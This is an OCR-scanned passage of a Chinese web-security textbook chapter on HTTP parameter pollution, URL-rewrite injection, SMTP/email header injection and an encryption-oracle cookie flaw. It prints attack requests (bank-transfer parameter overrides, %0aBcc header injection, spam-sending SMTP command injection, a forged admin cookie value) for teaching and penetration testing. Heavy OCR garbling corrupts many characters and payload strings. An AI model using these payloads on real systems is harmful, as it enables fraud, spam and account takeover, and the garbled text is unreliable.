http://mdsec.net/bank/48/ 


T 注解 与 SOAP 注 入 不 同 ， 在 后 端 请 求 中 注入 任意 异常 参数 
不 会 导致 任何 错误 。 因 此 ， 要 想 成 功 实施 攻击 ， 需 要 清楚 了 解 应 用 
程序 具体 使 用 了 哪些 后 端 参 数 。 在 黑 盒 环 境 下 ， 很 难 确定 这 些 信 

息 ， 但 是 ， 如 果 应 用 程序 使 用 任何 可 以 获取 或 搜索 其 代码 的 第 三 广 
组 件 ， 那 么 就 可 以 轻易 获得 这 些 信息 。 


1. HTTP 参 数 污 染 

HPP 是 一 种 可 用 于 各 种 环境 下 的 攻击 技巧 〈 请 参阅 第 12 草 和 第 13 
章 了 解 其 他 示例 ) ， 这 种 技巧 常用 在 HPI 攻 击 中 。 

如 果 请 求 中 包含 多 个 同名 请 求 ， 这 时 Web 服 务 絮 该 如 何 处 理 ? 对 
于 这 一 问题 ，HTTP 规 范 并 末 提 供 任何 指导 。 实 际 上 ， 各 种 Web 服 务 器 
的 处 理 方式 各 不 相同 ， 以 下 是 一 些 常见 的 处 理 方式 。 

口 使 用 参数 的 第 一 个 实例 。 

口 使 用 参数 的 最 后 一 个 实例 。 

口 串联 参数 值 ， 可 能 在 参数 之 间 添 加 分 隔 符 。 

口 构建 一 个 包含 所 有 请 求 值 的 数组 。 

在 前 面 的 HPI 示 例 中 ， 攻 击 者 可 以 在 后 端 请 求 中 添加 一 个 新 参 
数 。 实 际 上 ， 攻 击 者 可 以 对 其 实施 注入 攻击 的 请 求 很 可 能 已 经 包含 一 
个 与 攻击 者 所 针对 的 参数 同名 的 参数 。 在 这 种 情况 下 ， 攻 击 者 可 以 使 
用 HPI 条 件 注入 另 一 个 同名 参数 。 随 后 ， 应 用 程序 将 表现 出 何 种 行 
为 ， 将 取决 于 后 端 HTTP 服 务 器 如 何 处 理 重 复 的 参数 。 这 样 ， 攻 击 者 或 
许可 以 用 他 注入 的 参数 值 “ 履 盖 ? 原 始 参数 值 。 

例如 ， 如 果 原 始 的 后 端 请 求 为 : 


POST /doTransfer.asp HTTP/1.0 
Host: mdsec-mgr.int.mdsec.net 
Content-Length: 62 


fromacc=18281008samount=143 0é&clearedfunds=false&toacc=08447655 


H Aa vin AR SS ae EHEER WERAWERA, MDC aes BY LY 
前 端 请 求 中 的 FromAccount 参 数 实施 攻击 ， 如 下 所 示 : 
POST /bank/S2/Default .aspx HTTP/1.0 


Host: mdsec.net 


Content-Length: 96 


FromAcccunt=18281008%26clearedfundst3dtrue&Amount=1430&ToAccount=08447565 
6&Submit=Submit 


HR, AS SAN BIE, MWR a i AR HS aH (EA) BS PY Be 
后 一 个 实例 ， 则 攻击 者 可 以 对 前 端 请 求 中 的 ToAccount 参 数 实施 攻击 。 


尝试 访问 


http://mdsec.net/bank/52/ 
http://mdsec.net/bank/57/ 


HPP 攻 击 能 和 否 成 功 ， 在 很 大 程度 上 取决 于 目标 应 用 程序 服务 器 如 何 处 理 
多 个 同名 参数 ， 以 及 后 端 请 求 中 的 插入 点 是 否 准确 。 如 果 两 种 技术 需要 处 
理 相同 的 HTTP 请 求 ，HPP 攻 击 就 会 造成 严重 的 后 果 。Web 应 用 程序 防火 墙 
或 反 同 代理 可 能 会 处 理 某 个 请 求 ， 并 将 其 传递 给 Web 应 用 程序 ， 由 Web 应 用 
程序 抛弃 变量 ， 甚 至 是 基于 之 前 不 相关 的 请 求 部 分 构建 字符 串 。 

见 应 用 程序 服务 器 在 处 理 同名 参数 时 的 不 同行 为 ， 请 参阅 以 

下 论 : 

www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf 

2. 攻击 URL 转 换 

许多 服务 硕 会 在 所 请 求 的 URL 抵 达 时 重 写 这 些 URL， 再 将 它们 映射 到 
应 用 程序 中 的 相关 后 端 功能 。 除 传统 的 URL 重 写 外 ， 服 务 器 在 处 理 REST 风 
格 的 参数 、 定 制导 航 包 装 器 以 及 其 他 URL 转 换 方法 时 都 会 进行 URL 重 写 。 
这 种 处 理 方式 可 能 易 受 HPI 和 和 HPP 攻击 。 

为 了 简化 和 便于 导航 ， 一 些 应 用 程序 在 URL 的 文件 路 径 ， 而 非 查询 字 
符 串 中 插入 参数 值 。 通 币 ， 应 用 程序 会 通过 一 些 稍 单 的 规则 转换 URL ， 然 
后 将 其 转发 给 真正 的 目标 。Apache 中 的 以 下 mod_rewrite 规 则 用 于 处 理 可 公 
共 访 问 的 用 户 资 料 : 


RewriteCond %{THE_REQUEST} “[(A-Z]{3,9}\ /pub/user/ [*\&]*\ ETTP/ 


RewriteRule “*pub/user/([*/\.]+)$ /inc/user_mgr.php?mode=view&name=$1 


此 规则 接受 非常 简洁 的 请 求 ， 例 如 : 
/pub/user/marcus 


并 将 这 些 请 求 转 换 为 后 端 请 求 ， 以 便于 用 户 管 理 页 面 user_mgr.php 包 含 
的 view 功 能 进行 处 理 。 它 将 marcus 参 数 移 入 查询 字符 早 并 添加 mode=view 参 


/inc/user_mgr.php?mode=view&name=marcus 


在 这 种 情况 下 ， 攻 击 者 就 可 以 利用 HPI 攻 击 在 经 过 重 写 的 URL 中 注入 另 
一 个 mode 参 数 。 例 如 ， 如 果 攻 击 者 请 求 : 


/pub/user/marcus%2 6mode=edit 
URLARE KAARS AVURL AE: 
/inc/user_ngr .pho?mode=view&name=marcus&mode=edit 


讲 HPP 攻 击 的 我 们 说 到 ， 这 种 攻击 能 否 成 功 取决 于 服务 右 如 何 处 理 重 复 
的 参数 。 在 PHP 乎 台中 ，mode 参 数 和 被 视 为 具有 值 edit， 因 而 攻击 取得 成 功 。 


渗透 测试 步骤 


(1) 轮流 针对 每 个 请 求 参 数 进行 测试 ， 尝 试 使 用 各 种 语法 添 
加 一 个 新 注入 的 参数 。 

gJ %26f00%3dbar URL 编 码 的 &foo=bar 

DQ %3bfoo%3dbar URL 编 码 的 ;foo=bar 

口 %2526foo%253dbar 双重 URL 编 码 的 &foo=bar 

(2) 确定 任何 修改 后 不 会 改变 应 用 程序 的 行为 的 参数 实例 
( 仅 适用 于 在 修改 后 会 在 应 用 程序 的 啊 应 中 造成 某 种 差异 的 参 


数 ) 。 

(3) 在 上 一 步 确定 的 每 个 实例 都 可 以 实施 参数 注入 。 和 尝试 在 
请 求 的 不 同位 置 注入 一 个 已 知 的 参数 ， 看 这 样 做 古 否 可 以 覆盖 或 修 
改 现 有 的 某 个 参数 。 例 如 : 


FromAccount=18281008%2é6Amount%3d4444¢Amount=1430&ToAcco 
unt=08447656 


(4) 如 果 这 样 做 会 将 现 有 值 奉 换 为 新 值 ， 确 定 是 否 可 以 通过 
注入 一 个 由 后 端 服务 郁 读 取 的 值 来 避 开 任何 前 端 确认 机 制 。 

(5) 用 其 他 参数 名 称 替 换 注 入 的 已 知 参数 ， 如 第 4 章 介绍 应 用 
程序 解析 和 内 容 碍 找 时 所 述 。 

(6) 测试 应 用 程序 是 否 允 许 在 请 求 中 多 次 提交 同一 个 参数 。 
在 其 他 参数 前 后 ， 以 及 请 求 的 不 同位 置 (查询 字符 串 、cookie 和 消 
FRE) 提交 多 余 的 值 。 


10.5 ”注入 电子 邮件 


许多 应 用 程序 拥有 一 项 允许 用 户 通过 应 用 程序 提交 消 妃 的 功能 。 
例如 ， 癌 支持 人 员 报 告 问题 或 提供 天 于 Web 站 点 的 反馈 。 这 项 功能 一 
般 通 过 邮件 (ESMTP) 服务 器 执行 。 通 常 ， 用 户 提交 的 输入 被 插入 
到 邮件 服务 右 处 理 的 SMTP 会 话 中 。 如 果 攻 击 者 能 够 提交 未 被 过 滤 或 
净化 的 专门 设计 的 输入 ， 束 可 以 在 这 个 会 话 中 注入 任意 SMTP 命 令 。 

ZBI, DORR FA Pie A Aa BB 
地 址 〈 插 入 到 生成 电子 邮件 的 From 字 段 中 ) ， 还 可 以 指定 消息 的 主题 
和 其 他 细 市 。 能 够 控制 的 任何 字段 都 易于 受到 SMTP 注 入 。 

SMTP 注 入 漏洞 经 党 被 垃圾 邮件 发 送 者 利用 ， 他 们 扫描 因特网 查 
找 易 受 攻击 的 邮件 表单 ， 并 使 用 它们 生成 大 量 垃圾 电子 邮件 。 


10.5.1 纵 电 子 邮 件 标 > 
以 图 10-6 所 示 的 表单 为 例 ， 它 允许 用 户 发 送 关 于 应 用 程序 的 反 


< 
salt 


marcus@wahh-mail.com 


Site problem 


Confirm Order page doesn't iload 


Submit comments 


图 10-6 一 个 典型 的 站 点 反馈 表单 


在 该 表单 中 ， 用 户 可 指定 发 件 人 (From) 地 址 和 邮件 的 内 容 。 应 
用 程序 将 这 个 输入 传送 给 PHP mail () 命令 ， 由 它 建立 邮件 并 与 它 配 
置 的 邮件 服务 器 进行 必要 的 SMTP 会 话 。 生 成 的 邮件 如 下 : 


To: admin@wahh-app.com 
From: marcus@wahh-mail.com 
Subject: Site problem 


Confirm Order page doesn't load 


PHP mail () 命令 使 用 additional headers 参 数 为 消息 设 定 发 件 人 地 
址 。 这 个 参数 还 可 用 于 指定 其 他 标 头 ， 包 括 Cc 和 Bcc， 并 用 换行 符 分 
隅 每 个 被 请 求 的 标 头 。 因 此 ， 攻 击 者 可 以 通过 在 From 字 段 中 注入 这 其 
中 某 个 标 头 ， 将 邮件 发 送 给 任意 收 件 人 ， 如 图 10-7 所 示 。 


Your email address’ 


[marcus@wahh-mail.com%0aBcc:all@wahh-othercompany.com 


Subject Site problem 
Comment” Confirm Order page doesn't load - 


Submit comments | Reset | 


图 10-7 电子 邮件 标 头 注入 攻击 


这 会 导致 mail () 命令 生成 以 下 邮件 : 


To: admin@wahh-app.com 

From: marcus@wahh-mail.com 
Bee: all@wahh-othercompany.com 
Subject: Site problem 


Confirm Order page doesn't load 


10.5.2”SMTP 命 令 注 入 


在 其 他 情况 下 ， 应 用 程序 可 能 会 执行 SMTP 会 话 ， 或 者 将 用 户 提 
交 的 输入 传送 给 一 个 不 同 的 组 件 以 完成 这 一 任务 。 这 时 ， 我 们 惑 可 以 
人 epee 
YH o 

例如 ， 以 一 个 使 用 以 下 请 求 提交 站 点 反馈 的 应 用 程序 为 例 : 


POST feedback.php HTTP/1.1 

Host: wahh-app .com 

Content-Length: 56 

From=daf@wahh-mail.com&Sub)j ect=Site+feedback&Message=f[o00 

应 用 程序 会 使 用 以 下 命令 开始 一 个 SMTP 会 话 : 

MAIL FROM: daf@wahh-mail.com 
RCPT TO: feedback@wahh-app.com 
DATA 
From: daf@wahh-mail.com 


To: fLeedback@wahh-app.com 
Subject: Site feedback 
foo 


T 注解 SMIP 客 户 端 发 出 DATA 命 令 后 ， 应 用 程序 送出 电子 
邮件 消息 的 内 容 ， 包 括 消息 头 和 主体 ， 然 后 发 送 一 个 点 字符 O 


这 告诉 服务 句 消 恩 已 发 送 完 毕 ， 客 户 妆 可 以 发 出 其 他 SMTP 命 令 ， 
发 送 其 他 消息 。 


这 时 ， 攻 击 者 可 以 在 任何 受 控 的 电子 邮件 字段 中 注入 任意 SMTP 
命令 。 例 如 ， 他 可 以 笑 试 注入 Subject 了 字段， 如 下 所 示 : 
POST feedback.phyo ETTP/1.1 


Host: wahh-app.com 
Content-Length: 266 


From7dal@wahh-mail.com&Subject*Site+feedback30d%0afoot0Gs0as2e80d 
*0aMAIL+FROM: +mailé@wahh-viagra.comt0dt0aRCPT+TO: +john@wahh-mail 
.com*e0dtdaDATAt0dsCaFrom: +mai 1 @wahh-viagra.comt0dt0aTo: +john@wahh-mai | 
- comet 0ds0asSubject : +Cheap-VLAGRAS0d$0aBlah®0ct0atZetOdt0asMessage=foo 


如 有 果 应 用 程序 易 受 攻击 ， 那 么 会 建立 以 下 SMTP 会 话 ， 它 生成 两 
个 不 同 的 电子 邮件 消 轧 ， 其 中 第 二 个 完全 由 攻击 者 控制 : 


MATL FROM: daf@wahh-mail.com 
RCPT TO: feedback@wahh-app.com 
DATA 

From: daf@wahh-mail.com 

To: feedback@wahh-app.com 
Subject: Site+feedback 

foo 

MAIL FROM: mail@wahh-viagra.com 
RCPT TO: john@wahh-mail.com 
DATA 

From: mail@wahh-viagra.com 


To: john@wahh-mail.com 
Subject: Cheap V1AGR4 
Blah 


为 了 有 效 探查 应 用 程序 的 邮件 功能 ， 需 要 测试 每 一 个 提交 给 与 电 
子 邮件 有 关 的 功能 的 参数 ， 甚 至 那些 最 初 可 能 与 生成 的 消 忌 无 天 的 参 
数 。 


渗透 测试 员 还 应 该 测试 每 一 种 攻击 ， 并 在 每 个 测试 中 使 用 
Windows 和 UNIX 形 式 的 换行 符 。 


渗透 测试 步骤 


(1) 应 当 轮 流 提 交 下 面 的 每 个 测试 字符 串 作 为 每 一 个 参数 ， 
在 相关 位 置 插 入 电子 邮件 地 址 。 


<youremail>%0aCc:<youremail> 


<youremail>%0d%0aCc:<youremail> 
<youremail>%0aBcc: <youremail> 
<youremail>%0d%0aBec: <youremail> 


&0aDATAS 0a foot 0at2e3 DAMAIL+FROM: +<youremail>t0aRCPT+T0O:+<y 
ouremail>%0aDATA%0aFrom: +<youremail>%0aTo:+<youremail>%0as 
ubject :+testt0afoot0at2et0a 


%0d% 0aDATAS 04% 0a foot 04% 0a%2e% 04% OAMATL+FROM: +<youremail>%0 
4% 0aRCPT+TO;: +<youremail>%0d% 0aDATA? 04% 0aFrom: +<youremail>% 
04% 0aTo:+<youremail>s0d%0aSubject :+test%0d%0 

afoot 0d%0a%2e%0d30a 


(2) 留意 应 用 程序 返回 的 任何 错误 消息 。 如 果 这 些 错误 与 电 

een 天 ， 人 确定 是 否 需 要 对 输入 进行 调整 ， 以 
| 用 漏洞 。 

(3) 应 用 程序 的 啊 应 可 能 并 不 会 以 任何 形式 表示 一 个 漏洞 存 
* 应 该 监控 指定 的 电子 邮件 地 址 ， 看 十 否 收 到 任何 
电子 邮件 。 

(4) 仔细 检查 生成 相关 请 求 的 HTML 表单。 它们 可 能 提供 与 服 
务 需 端 使 用 的 软件 有 关 的 线索 。 其 中 可 能 包含 一 个 用 于 指定 电子 邮 
件 收 件 人 地 址 的 隐藏 或 蔡 用 了 字段， 可 以 直接 对 其 进行 修改 。 


YV ”提示 向 应 用 程序 支持 人 员 发 送 电 子 邮件 的 功能 常常 被 视 
为 外 围 功能 ， 应 用 程序 可 能 并 不 对 其 采用 与 主要 功能 相同 的 安全 标 
准 ， 或 者 进行 闫 格 的 测试 。 而 且 ， 因 为 它们 需要 连接 不 常用 的 后 闪 
组 件 ， 应 用 程序 往往 通过 直接 调用 相关 操作 系统 命令 来 执行 它们 。 


因此 ， 除 探查 SMTP 注 入 漏洞 外 ， 还 应 极其 仔细 地 检查 所 有 与 电子 
邮件 有 关 的 功能 ， 查 找 OS 命 令 注 入 漏洞 。 


10.5.4 ”防止 SMTP 注 入 


如 果 对 提交 给 电子 邮件 功能 或 MTP 会 话 使 用 的 任何 用 户 提交 的 
数据 进行 严格 的 确认 检查 ， 束 可 以 防止 SMTP 注 入 漏洞 。 因此 ， 应 根 
据 其 用 途 对 每 项 数据 进行 尽 可 能 严格 的 确认 。 

口 应 根据 一 个 适当 的 正则 表达 式 检查 电子 邮件 地 址 (当然 应 拒绝 
所 有 换行 符 ) 。 

口 消 妃 主题 不 得 包含 任何 换行 待 ， 并 应 实施 适当 的 长 度 限 制 。 

口 如 条 消 息 内 容 被 一 个 SMTP 会 话 直 接 使 用 ， 那 么 应 花 止 使 用 仅 包 
舍 一 个 点 字符 的 消 轧 行 。 


10.6 ”小结 


我 们 已 经 分 析 了 一 系列 针对 后 端 应 用 程序 组 件 的 攻击 ， 了 解 到 确 
定 并 利用 每 一 种 漏洞 所 需 采 取 的 实际 步 又 。 许 多 现实 世界 的 漏洞 ， 使 
用 应 用 程序 后 立即 束 会 发 现 ， 例 如 ， 通 过 在 搜索 框 中 输入 异 音 语法 进 
行 搜索 。 另 外 ， 这 些 漏 洞 可 能 隐藏 得 非常 深 ， 极 少 给 应 用 程序 造成 可 
以 检测 的 行为 差异 ， 也 无 法 通过 提交 并 操纵 专门 设计 的 输入 的 多 阶段 
过 程 发 现 。 

要 确定 应 用 程序 中 存在 的 后 端 注入 缺陷 ， 需 要 进行 耐心 仔细 的 检 
测 。 实 际 上 ， 几 乎 每 一 种 注入 缺陷 都 会 在 处 理 用 户 提交 的 数据 过 程 中 
表露 出 来 ， 这 些 数 据 包 括 碍 询 字 符 串 参数 的 名 称 与 值 、 POST 数据 、 
cookie 以 及 其 他 HTTP 消 奶头 。 许 多 时 候 ， 只 有 在 全 面 探查 了 相关 参 
数 ， 明 确 了 解 应 用 程序 对 输入 执行 了 何 种 类 型 的 处 理 ， 并 排除 测试 过 
程 中 的 障碍 后 ， 漏 洞 才 会 显露 出 来 。 

面 对 后 端 应 用 程序 组 件 的 攻击 造成 了 大 量 潜在 的 受 攻 击 面 ， 活 透 
测 弃 员 可 能 觉得 对 应 用 程序 实施 任何 三重 的 攻击 都 必须 付出 巨大 的 努 
力 。 然 而 ， 从 很 大 程度 上 讲 ， 实 施 有 效 攻 击 需要 从 直觉 上 了 解 漏洞 的 
位 置 ， 以 及 如 何 对 其 加 以 利用 。 获 得 这 种 直觉 的 唯一 途径 是 进行 实 
践 ， 针 对 在 现实 中 允 到 的 应 用 程序 演练 前 面 描述 的 技巧 ， 并 观察 它们 
如 何 应 对 这 些 攻击 。 


10.7 ”问题 


欲 知 问题 答案 ， 请 访问 http://mdsec.net/wahh ° 
(1) 某 网 络 设备 提供 用 于 执行 设备 配置 的 Web 界 面 。 为 什么 这 种 
功能 通常 易于 受到 操作 系统 命令 注入 攻击 ? 
(2) 在 测试 以 下 URL 时 : 


http: //wahh-app.com/home/statsmgr.aspx?country=US 


将 country 参 数 的 值 更 改 为 foo 导 人 致 以 下 错误 消 忆 : 


~ 


Could not open file: D:\app\default\home\logs\foo.log (invalid file). 


可 以 采取 哪些 步骤 对 应 用 程序 实施 攻击 ? 
(3) 在 对 一 个 在 POST 请 求 中 以 XML 格式 传送 数据 的 应 用 程序 进 
行 测试 时 ， 可 以 利用 哪 种 漏洞 从 服务 器 的 文件 系统 中 读 取 任意 文件 ? 
要 成 功 实施 攻击 ， 必 须 满足 哪些 先决 条 件 ? 
(4) 和 癌 ASPNET 平 台 上 运行 的 应 用 程序 提出 以 下 请 求 : 


POST /home.aspx?p=urlparaml&p=urlparam2 HTTP/1.1 
Host: wahh-app.com 

Cookie: p=cookieparam 

Content-Type: application/x-www-form-urlencoded 
Content-Length: 15 


p=bodyparam 
应 用 程序 执行 以 下 代码 : 
String param = Request.Params["p"]; 


请 问 param 变 量 的 值 是 什么 ? 
(5) HPP 是 HPI 的 前 提 ， 还 是 HPI 是 HPP 的 前 提 ? 
(6) 某 应 用 程序 包含 一 项 功能 ， 该 功能 向 外 部 域 提出 请 求 ， 并 返 
回 这 些 请 求 的 响应 。 为 防止 服务 器 端 重 定向 攻击 检索 应 用 程序 自己 的 
Web 服 务 器 上 的 受 保护 资源 ， 应 用 程序 阻止 了 以 localhost 或 127.0.0.1 为 
目标 的 请 求 。 如 何 突 破 这 种 防御 ， 以 访问 服务 器 上 的 资源 ? 


(7) 某 应 用 程序 使 用 一 项 用 于 提交 用 户 反 馈 的 功能 。 该 功能 允许 

用 户 提交 他 们 的 电子 邮件 地 址 、 邮 件 主题 及 详细 的 反馈 。 然 后 ， 应 用 
程序 以 用 户 提交 的 主题 和 反馈 为 邮件 正文 ， 从 用 户 的 电子 邮件 地 址 回 
feedback@wahh-app.com 发 送 一 封 电 子 邮 件 。 以 下 哪 一 种 方法 能 够 有 效 
防御 邮件 注入 攻击 ? 

(a) 在 邮件 服务 器 上 禁用 邮件 中 继 。 

(b) 使 用 feedback@wahh-app.com 便 编码 RCPT TO 字段 。 

(c) 确保 用 户 提交 的 输入 不 包含 任何 换行 符 或 其 他 SMTP 元 

FIF ° 


所 有 web 应 用 程序 都 通过 逻辑 实现 各 种 功能 。 从 根本 上 讲 ， 用 编 
程 语言 编写 代码 就 是 把 一 个 复杂 的 进程 分 解 成 一 些 非常 简单 而 又 相互 
独立 的 滥 辑 步骤 。 将 一 项 对 人 类 有 用 的 功能 转换 成 一 系列 计算 机 能 够 
执行 的 细微 操作 ， 需 要 掌握 大 量 的 技巧 并 进行 周密 的 安排 。 顺 利 、 安 
全 地 完成 以 上 任务 就 更 显 困难 。 如 果 由 背景 各 不 相同 的 开发 者 与 程序 
员 并 行 开发 同一 个 应 用 程序 ， 那 么 在 这 个 过 程 中 可 能 会 发 生 很 多 错 
误 。 

在 所 有 即使 是 非常 简单 的 Web 应 用 程序 中 ， 每 个 阶段 都 会 执行 数 
目 庞 大 的 逻辑 操作 。 这 些 渴 辑 代表 着 一 个 复杂 的 受 攻击 面 ， 它 虽然 从 
未 消失 ， 但 往往 被 人 们 和 忽略。 许多 代码 审查 与 渗透 测试 主要 针对 常见 
的 “头条 * 式 漏洞 ， 如 SQL 注 入 和 跨 站 点 脚本 ， 因 为 它们 具有 容易 辨别 
的 签名 ， 人 们 对 它们 的 利用 方法 也 进行 了 广泛 的 研究 。 相反， 应 用 程 
序 的 逻辑 缺陷 更 难以 辨别 ， 每 一 种 缺陷 似乎 都 是 唯一 的 ， 通 常 自动 漏 
润 扫描 器 也 无 法 发 现 它们 。 因 此 ， 它 们 并 未 受到 应 有 的 重视 与 关注 ， 
攻击 者 对 之 非常 感 兴趣 。 

本 章 将 描述 各 种 常见 的 Web 应 用 程序 逻辑 缺陷 ， 以 及 渗透 测试 员 
在 探查 与 攻击 应 用 程序 逻辑 时 需要 采取 的 实用 步 又。 我 们 将 举 出 一 系 
列 实 际 示例 ， 每 个 示例 说 明 一 种 不 同 的 逻辑 缺陷 ， 它 们 共同 说 明 设计 
考 与 开发 者 做 出 的 假设 可 能 会 直接 导致 逻 得 缺陷 ， 在 应 用 程序 中 造成 
安全 漏洞 。 


11.1 3 、 


Web 应 用 程序 中 的 逻辑 缺陷 各 不 相同 。 它 们 包括 代码 中 的 简单 错 
误 ， 以 及 几 种 应 用 程序 核心 组 件 互 操作 方面 的 极其 复 灯 的 漏洞 。 有 了 时 
候 ， 这 些 缺 陷 非常 明显 ， 很 容易 发 现 ; 但 是 ， 有 些 缺 陷 可 能 极其 微 
妙 ， 能 够 避 开 最 为 严格 的 代码 审查 或 渗透 测试 。 

与 SQL 注入 或 路 站 点 脚本 漏洞 不 同 ， 逻 辑 缺 陷 没有 共有 的 “等 
名 ”。 当然 ， 定 义 特性 是 指 应 用 程序 执行 的 逻辑 存在 某 种 缺陷 。 许 多 时 
候 ， 逻 辑 缺 陷 表现 为 设计 者 或 开发 者 在 思考 过 程 中 做 出 的 特殊 假设 存 
在 明显 或 隐 含 的 错误 。 简 单 来 讲 ， 程 序 员 可 能 这 样 认为 : “如 有 果 发 生 
A， 束 一 定 会 出 现 B， 因 此 我 执行 C。” 他 们 并 不 会 提出 截然 不 同 的 问 
题 :“ 如 果 发 生 X 会 脏 样 2 ”因而 没有 考虑 到 假设 以 外 的 情形 。 在 许多 
情况 下 ， 这 种 错误 的 假设 会 造成 大 量 的 安全 漏洞 。 

近 些 年 来 ， 人们 防范 营 见 Web 应 用 程序 漏洞 的 意识 已 经 增强 ， 一 
些 漏洞 的 出 现 几 率 与 亚 重 程度 也 显著 降低 。 然 而 ， 鉴 于 逻辑 缺陷 的 本 
质 ， 即 使 是 实施 安全 开发 标准 、 使 用 代码 审查 工具 或 常规 渗透 测试 ， 
我 们 仍然 无 法 避免 这 种 缺陷 。 逻 辑 缺 陷 的 多 样 性 本 质 ， 以 及 探查 与 防 
止 它们 往往 需要 从 各 个 不 同 的 角度 思考 问题 ， 预 示 着 在 很 长 一 段 时 期 
内 ， 逻 辑 缺 陷 仍 将 大 量 存 在 。 因 此 ， 精 明 的 攻击 者 会 特别 注意 目标 应 
用 程序 采用 的 逻辑 方式 ， 设 法 了 解 设计 者 与 开发 者 做 出 的 可 能 假设 ， 
然后 考虑 如 何 攻破 这 些 假设 。 


11.2 ”现实 中 的 逻辑 缺陷 


掌握 理论 知识 并 不 是 了 解 逻辑 缺陷 的 最 佳 办 法 ， 通 过 实例 进行 学 
习 才 是 最 佳 途径 。 虽 然 各 种 逻辑 缺陷 之 间 存 在 巨大 的 差异 ， 但 它们 仍 
包含 一 些 共同 特征 ， 并 证 实 开发 者 总 会 犯 各 种 各 样 的 错误 。 因 此 ， 从 
获得 的 局 示 有 助 于 攻击 者 在 各 种 不 同 的 情况 下 发 现 
新 的 缺陷 。 


— 


11.2.1 1: > ZN 


笔者 曾 在 许多 不 同类 型 的 应 用 程序 中 发 现 * 加 密 提示 ”漏洞 。 攻 击 
者 可 以 利用 这 种 漏洞 实施 各 种 攻击 ， 如 解密 打印 软件 中 的 域 证 书 或 破 
坏 云 计算 。 下 面 是 这 种 漏洞 的 一 个 典型 示例 ， 是 在 一 个 软件 销售 站 点 
上 发 现 的 。 

1. 功能 

该 应 用 程序 实施 “ 记 住 我 功能， 人 允许 应 用 程序 在 浏览 器 中 设置 一 
个 永久 cookie， 用 户 从 而 无 须 登 录 即 可 访问 应 用 程序 。 这 个 cookie 受 到 
一 个 加 密 算 法 的 保护 ， 以 防止 自 改 或 披露 。 该 算法 基于 一 个 由 姓名 、 
用 户 ID 和 不 定数 据 组 成 的 字符 串 ， 以 确保 合成 值 是 唯一 的 ， 并 且 无 法 
预测 。 为 确保 能 够 访问 该 cookie 的 攻击 者 无 法 实施 重 放 攻击 ， 应 用 程 
序 还 收集 机 器 专用 的 数据 ， 包 括 IP 地 址 。 

于 是 ， 这 个 cookie 被 视 为 一 个 可 靠 的 解决 方案 ， 用 于 保护 业务 功 
能 中 易 受 攻击 的 部 分 。 

除 “ 记 住 我 ”功能 外 ， 该 应 用 程序 还 具有 男 一 项 功能 ， 将 用 户 的 昵 
称 存 储 在 一 个 名 为 ScreenName 的 cookie 中 。 这 样 ， 在 用 户 下 次 访问 该 
站 点 上 时， 就 可 以 在 站 点 的 角落 位 置 收 到 个 性 化 的 问候 。 鉴 于 这 个 名 称 
也 属于 安全 信息 ， 因 此 也 应 对 它 进 行 加 密 。 

2. 假设 

开发 者 认为 ， 与 RememberMe cookie 相 比 ，ScreenName cookie 对 
攻击 者 而 言 价值 不 大 ， 于 是 他 们 决定 使 用 相同 的 加 密 算 法 来 保护 这 两 
个 cookie。 他 们 没有 考虑 到 的 是 ， 用 户 可 以 指定 目 己 的 昵称 ， 并 在 屏 
幕 上 查看 该 名 称 。 这 在 无 意 间 使 用 户 能够 访问 用 于 保护 永久 号 份 验证 
令 脾 RememberMe 的 加 密 功 能 〈 及 加 密 密 铀 ) 。 

3. 攻击 方法 


在 一 个 简单 的 攻击 中 ， 用 户 提 交 其 RememberMe cookie 的 加 密 值 
来 苦 代 加 密 的 ScreenName cookie。 在 向 用 户 显 示 上 昵称 时 ， 应 用 程序 将 
解密 该 值 ， 如 果 人 解密 成 功 ， 将 在 屏幕 上 显示 结果 。 这 个 过 程 生 成 了 如 
PIB: 


Welcome, marcus|734|192.168.4.282750184 


虽然 这 是 个 有 趣 的 问题 ， 但 不 一 定 是 个 高 风险 的 问题 。 它 只 是 说 
明 ， 攻 击 者 可 以 列 出 加 密 的 RememberMe cookie 的 内 容 ， 包 括 用 户 
名 、 用 户 ID 和 IP 地 址 。 由 于 cookie 中 没有 保存 密码 ， 攻 击 者 并 没有 办 
法 对 获得 的 信息 立即 加 以 利用 。 

真正 的 问题 在 于 ， 用 户 能 够 指定 他 们 的 昵称 。 因 此， 用 户 可 以 选 
择 上 自己 的 昵称 ， 例 如: 


admin|1/192.168.4.282750184 


如 果 用 户 退 出 系统 然后 重新 登录 ， 应 用 程序 就 会 加 密 这 个 值 ， 将 
它 作 为 加 密 的 ScreenName cookie 存 储 在 用 户 的 浏览 器 中 。 如 果 攻 击 考 
提交 这 个 加 密 的 令 牌 ， 将 它 作 为 RememberMe cookie 的 值 ， 应 用 程序 
就 会 解密 该 cookie， 读 取 用 户 ID， 并 让 攻击 者 以 管理 员 身 份 登录 。 即 
使 应 用 程序 采用 三 重 DES 加 密 ， 使 用 强大 的 密 钥 并 阻止 重 放 攻 击 ， 攻 
击 者 仍然 可 以 将 应 用 程序 作为 “< 加密 提 示 ”， 以 解密 并 加 密 任意 值 。 


渗透 测试 步骤 


这 种 类 型 的 漏洞 表现 在 许多 不 同 的 情况 下 ， 包 括 账 户 恢 复 令 
牌 ， 基 于 令 脾 访问 经 过 验证 的 资源 ， 以 及 癌 客 户 端 发 送 的 、 需 要 防 
算 改 或 对 用 户 不 可 读 的 任何 其 他 值 。 
(1) 在 应 用 程序 中 查找 任何 使 用 加 密 (而 非 散 列 ) 的 位 置 。 
确定 任何 应 用 程序 加 密 或 解密 用 户 提 交 的 值 的 位 置 ， 并 竹 试 苦 代 在 


应 用 程序 中 发 现 的 任何 其 他 加 密 值 。 近 试 在 应 用 程序 中 导致 可 以 的 
示 加 密 值 ， 或 可 以 在 屏幕 上 “有 意 ” 显 示 加 密 值 的 错误 。 

(2) 确定 应 用 程序 中 可 以 通过 提交 加 密 值 导致 在 响应 中 显示 
对 应 的 解密 值 的 位 置 ， 以 碍 找 “ 提 示 提 示 ? 漏 洞 。 确 定 这 种 漏洞 是 否 
会 导致 敏感 信息 (如 密码 或 信用 卡 ) 被 披露 。 

(3) 确定 可 以 通过 提交 明文 值 导 致 应 用 程序 返回 对 应 的 加 密 
值 的 位 置 ， 以 查找 “提示 加 密 ? 漏 洞 。 确 定 是 否 可 以 通过 指定 任意 
值 ， 或 应 用 程序 将 会 处 理 的 恶意 有 效 载 傈 ， 对 这 种 漏洞 加 以 利用 。 


11.2.2 例 2， 欺 骗 密 码 修改 功能 


我 们 曾 在 一 家 金融 服务 公司 使 用 的 Web 应 用 程序 以 及 AOL AIM 企 
ate BEF PAIDRA E RR o 

1. 功能 

